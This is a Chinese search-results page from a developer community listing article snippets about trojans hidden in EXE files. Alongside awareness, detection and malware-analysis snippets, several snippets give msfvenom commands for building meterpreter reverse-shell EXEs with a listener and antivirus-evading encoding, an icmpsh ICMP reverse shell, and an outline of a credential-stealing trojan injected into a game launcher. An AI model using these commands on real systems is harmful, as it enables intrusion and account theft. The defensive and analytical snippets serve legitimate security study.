- 综合排序
- 最热优先
- 最新优先
- 来自专栏2024年网络安全宣传周
网络安全宣传周 - EXE 文件携带木马
然而,一些不法分子利用用户对娱乐的需求,将木马程序隐藏在看似正常的小游戏 EXE 文件中,给用户的电脑安全带来了严重威胁。 二、EXE 文件携带木马的隐藏方式(一)代码混淆通过对木马代码进行混淆处理,使其难以被常规的安全检测工具识别和分析。(二)加壳技术使用加壳工具对木马程序进行封装,改变其特征码,逃避杀毒软件的查杀。 三、木马植入机制(一)自动运行在 EXE 文件被执行时,木马程序自动启动并尝试获取系统的管理员权限。(二)修改系统设置更改注册表、系统服务等设置,确保木马在系统启动时能够自动加载。 (二)物联网风险随着物联网设备的普及,EXE 文件携带的木马可能会扩展到智能设备领域,带来新的安全挑战。 (三)社交工程利用攻击者可能会更加巧妙地利用社交工程手段,诱使用户下载和运行携带木马的 EXE 文件。十、结论EXE 文件携带木马是一种严重的网络安全威胁,给个人和社会带来了巨大的风险和损失。
49910编辑于 2024-08-17 aipy实战:建设PE文件查杀神器,阻止Windows EXE木马!
查熵值异常(判断是否加密 / 加壳)(3)揪可疑 API 组合(像注册表篡改、网络通信链)(4)解析 PE 头(看编译环境、系统兼容性、加壳痕迹)二、过程实战测了个可疑文件,刚用工具跑了 nimplant.exe ,结果吓一跳:提示词:帮我写一个小型的木马静态特征查杀工具,用于检测windows下的exe可执行文件是否是可疑的木马。 最后,测试我的exe程序:"D:\Tools\aipy20250411\aipy\nimplant.exe"。检测这个文件是不是恶意的木马。把写好的软件保存在项目文件夹下。 对于程序动态连接函数,Aipy 也能仔细排查出结果啦:扫出 426 个可疑字符串,含键盘记录、勒索关键词熵值超高(.rdata 节区 6.94),明显加密痕迹检测到注册表篡改 + 网络通信 API 组合,妥妥的木马行为结论 三、优势轻量:Python 脚本直接跑,不挑环境✨灵活:特征库可自定义,适合二次开发实用:样本初筛、应急响应都能用这次打造的PE文件查杀工具初战告捷,成功识别出恶意木马的多种特征,堪称静态分析的“小钢炮
26010编辑于 2025-05-23kali使用msf生成exe木马常用最简一条龙命令
multi/handlersetpayloadwindows/meterpreter/reverse_tcpsetLHOST192.168.186.46setLPORT4444exploit✅第一步:生成木马程序 展开代码语言:BashAI代码解释msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.186.46LPORT=4444-fexe-oiarc.exe 载荷LHOST=192.168.186.46攻击者的IP(即你Kali或监听机器的IP)LPORT=4444攻击者监听的端口(反向连接目标会连回这个端口)-fexe输出格式为Windows可执行文件(.exe )-oiarc.exe输出文件名为iarc.exe总结:这条命令会生成一个Windows木马程序iarc.exe,一旦在目标Windows机器上运行,它会主动连接回192.168.186.46:4444 ✅第五步:设置监听IP和端口展开代码语言:BashAI代码解释setLHOST192.168.186.46setLPORT4444这两行必须和生成木马时用的LHOST和LPORT完全一致,否则无法建立连接
1.2K20编辑于 2025-11-14- 来自专栏IT大咖说
咋多了一个svchost.exe进程?小心!你可能中了Bazar后门木马
据美国科技媒体BleepingComputer报道,一场新的网络钓鱼活动正在试图借助一种名为“BazarBackdoor”的新型后门木马来获取目标企业网络的完全访问权限。 基于代码的相似性,臭名昭著的TrickBot银行木马的开发人员被认为是幕后黑手。 网络钓鱼电子邮件 在这场活动中,钓鱼邮件可能是各种主题,如客户投诉、新型冠状病毒以及裁员表。 ? 例如,“新型冠状病毒”主题诱饵文档对应的文件名为“PreviewReport.DOC.exe”,“客户投诉”主题诱饵文档对应的文件名为“Preview.PDF.exe”。 图6.C2通信 但是,第二个C2请求将下载XOR加密的有效载荷,即BazarBackdoor后门木马。 ? 图8.将后门注入svchost.exe 由于Windows任务管理中时刻都运行着大量的svchost.exe进程,因此大多数用户都不太可能会注意到什么时候多出了一个这样的进程,进而也就不会注意到后门的存在
2.9K20发布于 2020-05-19 - 来自专栏全栈程序员必看
trojangeneric木马_kali木马绑定app
Kworker 木马,如果发现root 权限计划任务有以下这种非常规任务,说明已经中招成了矿机 Dt 环境,大家要注意,切莫随便给开放端口。
2K40编辑于 2022-11-08 - 来自专栏用户10781703的专栏
浅谈木马
环境: 攻击者:kali 目标主机:Windows 一、了解木马 1.木马,又称为特洛伊木马 特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。 Windows木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f exe -o muma.exe 三、木马的危害 由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。 -p windows/meterpreter/reverse_tcp -e x86/shikata_ganai -i 30 -b ’\x00’ lhost=hackIP lport=4444 -f exe -o muma.exe -e 编码的方式 -i 编码次数 -b不使用十六进制00 一些其他的编码方式,可以使用msfvenom -l encoders命令查看 四、木马防护 1.木马的传播途径 (1
1.3K20编辑于 2023-10-10 - 来自专栏Eric杂货铺
pyinstaller.exe带logo打包exe
可以在Windows、Mac OS X和Linux上使用,但是并不是跨平台的,而是说你要是希望打包成.exe文件,需要在Windows系统上运行PyInstaller进行打包工作;打包成mac app,
1.9K30发布于 2020-09-24 - 来自专栏FreeBuf
Kronos银行木马被发现,疑似新版Osiris木马
根据Proofpoint安全研究人员的说法,新版本的Kronos银行木马正蠢蠢欲动,研究人员证实,最近三次宣传这个旧木马的翻新版本在2014年经历了鼎盛时期。 Kronos 2018版可能是新版Osiris木马 研究人员说,与此同时,这种新的Kronos变种开始出现在他们的雷达上,一名恶意软件作者开始在黑客论坛上宣传一种新的银行木马,他称之为Osiris。 最大的线索是这个新特洛伊木马的作者声称他的木马只有350 KB大小,接近于早期Kronos 2018版样本——研究人员4月份发现的(351 KB)大小。 该样本被命名为os.exe,大概来自Osiris,巧合与否,目前没有得到证实。 ? *参考来源:bleepingcomputer,由抗生素1209编译,转载请注明来自FreeBuf.COM
1.6K50发布于 2018-07-31 - 来自专栏全栈程序员必看
instsrv.exe srvany.exe启动服务
ConsulClient\Parameters"; ///
/// 通过注册表注册Consul Agent服务 /// /// <param name="consulPath">exe 所在文件夹</param> /// <param name="consulExeLocal">consul.exe,exe物理路径</param> private static void ConsulClientRegEdit = null) root.DeleteSubKeyTree(subkey); } } 2.instsrv.exe srvany.exe启动服务 string consulExeLocal = DefautToolsRelyHelper.Consul + "\\consul.exe"; string srvanyPath = DefautToolsRelyHelper.Srvany + @"\srvany\srvany.exe"; string instsrvPath = DefautToolsRelyHelper.Srvany + @"\srvany\instsrv.exe"; CheckRelyTools(consulExeLocal, srvanyPath,1.1K20编辑于 2022-09-01 - 来自专栏白安全组
挖矿木马详解
一分钟了解什么是挖矿木马 什么是挖矿木马? 定位挖矿 普通开源挖矿程序 如果感觉主机突然出现明显的卡顿,可以打开任务管理器,查看CPU使用率,中了挖矿木马时,用任务管理器可能会看到存在奇怪的进程,CPU占用率较高,比如下图中,LogonUI.exe ,ProtectionX挖矿木马就是其中一种,除了自保护和自启动外,还会释放安装驱动文件,木马运行流程如图: 母体运行后会将自身设置为隐藏属性,并释放win1logon.exe、wuauc1t.exe 、ProcessExtended.dll,并且释放一个快捷方式用于带参数启动wuauc1t.exe: 同时会在temp目录下释放随机字符命名的驱动文件,并通过注册成服务hy5.5,对应的注册表键值如下 : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\hy5.5 并为母体1sass.exe添加注册表自启动: HKEY_LOCAL_MACHINE
13.4K61发布于 2019-12-02 - 来自专栏黑客技术家园
木马盗号《一》
这一节主要给大家分享的是黑客是如何利用木马进行盗号的。 久前看了一些安全方面的书籍。在看完了《计算机病毒揭秘与对抗》---王倍昌书 以后,打算找个目标试试手。 由于本次只是木马主要功能原理介绍,所以我并不介绍木马怎么隐藏、怎么绕过360防御(本文木马很容易被杀毒软件查杀)进行免杀。(-。-/主要我还没看。O(∩_∩)O)。 其次隐蔽性较好,他是直接在目标关键EXE注入代码,可以理解为病毒代码就是EXE的一部分。不需要另外加载DLL或者开启服务,那样目标比较大。 现在已经选好了方式:把病毒代码写入到目标EXE,然后每次运行目标EXE就会运行我们的恶意代码。下面介绍我们应该通过怎么样方式去捕获WeGame的账号和密码。 难道要让本菜IDA逆向分析整个关键EXE文件找漏洞,显然不太适合我-。-,一方面技术不行,另一方面没那么多时间。。。。那么怎么破解这个密码框捕获到的密码不对的问题呢?
1.9K30发布于 2021-04-02 - 来自专栏黑客技术家园
木马盗号《三》
背景: 上一篇 WeGame盗号木马之旅(二) 我们实现了键盘按键模拟驱动的开发,这篇我们实现下具体注入代码的编写。 目标: 具体的注入代码编写。实现账号获取和密码获取。 这一篇我们写的注入代码就是上面橙色框内的代码,后面我们会写InfectiveVirus.exe的代码,用于实现怎么把这次实现的代码写到目标EXE,并且让他像正常工作一样,但是关键时刻会向服务器发送信息。 我们的注入代码可以当作就像是原本就运行在目标EXE里面的代码一样。 最后通过一个char数组保存二进制到InfectiveVirus.exe。然后直接memcpy复制二进制到目标EXE即可。如图是我写好的二进制代码char 数组: ? 相加就是0X00570000,我的数据是加到原来EXE尾部的。下面的TASLogin.exe 也是同理。 TASLogin.exe PE结构图: ?
2K20发布于 2021-04-02 - 来自专栏黑客技术家园
木马盗号《二》
看完了第一篇 WeGame盗号木马之旅(一) ,相信读者已经大概明白了我们需要干什么。 二、编写具体注入到目标EXE,实现按键截取的代码。 三、编写服务端接受消息的程序。 四、编写具体的病毒EXE,实现感染目标EXE并注入我们编写的木马代码。
2K30发布于 2021-04-02 - 来自专栏黑客技术家园
木马盗号《四》
目标: 实现服务端的代码编写,用于接受木马发回的消息。 实现: 由于这一篇实现任务比较简单,我就讲一下密码的消息接收,账号类似。
1K40发布于 2021-04-02 - 来自专栏全栈程序员必看
Python使用py2exe打包exe程序
py2exe可以将Python程序打包成exe程序,使得可以在没有Python环境的机器上运行。 # 为了打包成exe运行的时候能够看清楚,不会一闪而过 sleep(10) 下载py2exe: pip install py2exe 编写setup.py 文件: from distutils.core import setup import py2exe INCLUDES = ['hello_test'] options = { "py2exe 'hello_test.py'}] # 生成一个控制台形式的exe程序,对应的有windows=[],生成GUI形式的exe程序 ) 具体的参数在代码注释里面已描写,更多参数含义可自行搜索 然后使用python命令生成: python setup.py py2exe 然后在项目根目录会生成dist文件夹,里面就有刚打包好的exe程序: 双击启动: 版权声明
6.5K21编辑于 2022-11-04 - 来自专栏FreeBuf
来自云端的木马:“百家”木马集团分析
文件名:客户通知单xxx.exe(xxx代表id号) MD5:ab8c32c0360d063375794e76ae824a30 大小:340992字节 0×02样本行为分析 1、加载器行为 1)木马运行后首先从文件名中从左到右查找数字 2)释放winlogopc.exe、DULIB.DLL两个文件到System32目录组成白加黑,并执行winlogopc.exe,winlogopc.exe为联想相关文件,为白文件。 ? 4)DULIB.DLL运行后再次创建一个wextract.exe傀儡进程,并解密出一个PE注入到傀儡进程中执行。 ? 5)添加注册表实现开机启动winlogopc.exe,并不断守护傀儡进程和注册表一旦被结束,立即重新创建进程添加注册表启动项。 6)傀儡进程wextract.exe中执行的代码为远程控制木马Gh0st变种,C&C服务器地址如下: 域名/ip:a.vo88.top 端口:1818 ?
1.7K70发布于 2018-02-08 - 来自专栏七夜安全博客
教你学木马攻防 | 隧道木马 | ICMP反弹shell
前言 前文回顾: 教你学木马攻防 | 隧道木马 | 第一课 在上一篇文章中,我们讲解了木马中常用的端口转发技术,这一节讲解一下木马通信协议中的ICMP协议,并通过ICMP实现一个反弹shell。 先在VPS启动命令: python icmpsh_m.py 源ip 目的ip 接着在被控端启动命令: icmpsh.exe -t 目的ip 这样ICMP反弹shell就建立了,可以远程执行命令了 第四节 最后 推荐阅读: Python RASP 工程化:一次入侵的思考 教你学木马攻防 | 隧道木马 | 第一课 一个Python开源项目-哈勃沙箱源码剖析(下)
4.4K30发布于 2019-03-19 - 来自专栏全栈程序员必看
pyinstaller 打包exe
自己的路径) 4.打包 pyinstaller -F -w main.py 这样第一次打包生成 main.spec 文件 还会完成打包生成build、dist两个文件夹 此时以管理员权限打开dist下的exe hiddenimports=[] 修改成hiddenimports=[‘sklearn’,‘tensorflow’] 5.然后 pyinstaller -F -w main.spec就打包成功 管理员权限运行main.exe
1.4K20编辑于 2022-09-12 - 来自专栏花落的技术专栏
py 打包exe
py打包成exe如何打的足够小 Python脚本不能在没有安装Python的机器上运行,如果我们想把自己的脚本分享给没有python环境的小伙伴使用,这个时候就需要将脚本打包成exe文件,即使使用方电脑没有安装 python解释器,这个exe也能在上面运行。 Pyinstaller -F -w py_word.py # 不带控制台的打包 Pyinstaller -F -w -i chengzi.ico py_word.py # 打包指定exe图标打包 另一个是可以自己生成,这里就给大家分享一个网站,可以把其他格式图片转成ico格式:https://app.xunjiepdf.com/img2icon/ 二、压缩打包 假如生成的exe太大,怎么转换的小一点 Python打包exe,不但体积大而且运行慢。解释型语言相对较慢。要解决大而慢,只能用编译型语言,如C,C++,甚至VB都好很多,体积最小的是汇编。
1.7K20编辑于 2021-12-04 - 来自专栏全栈程序员必看
windows无exe
windows无exe 加载脚本方式 恶意脚本加载 powershell mshta.exe CScript.exe&WScript.exe Windows原生工具加载 regsvr32.exe dll sct certutil.exe winrm.vbs msiexec.exe wmic.exe pubprn.vbs 参考 加载脚本方式 利用Windows自带的解析器:PowerShell、VBScript 、批处理文件和JavaScript,对应的应用程序分别为powershell.exe、cscript.exe、cmd.exe和mshta.exe。 、rundll32.exe、certutil.exe、schtasks.exe、wmic.exe等,脚本类型的有:winrm.vbs、wmiexec.vbs、pubprn.vbs等 恶意脚本加载 powershell &WScript.exe 上述两个工具都可以解析运行vbs和js的脚本。
1.9K21编辑于 2022-09-14
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号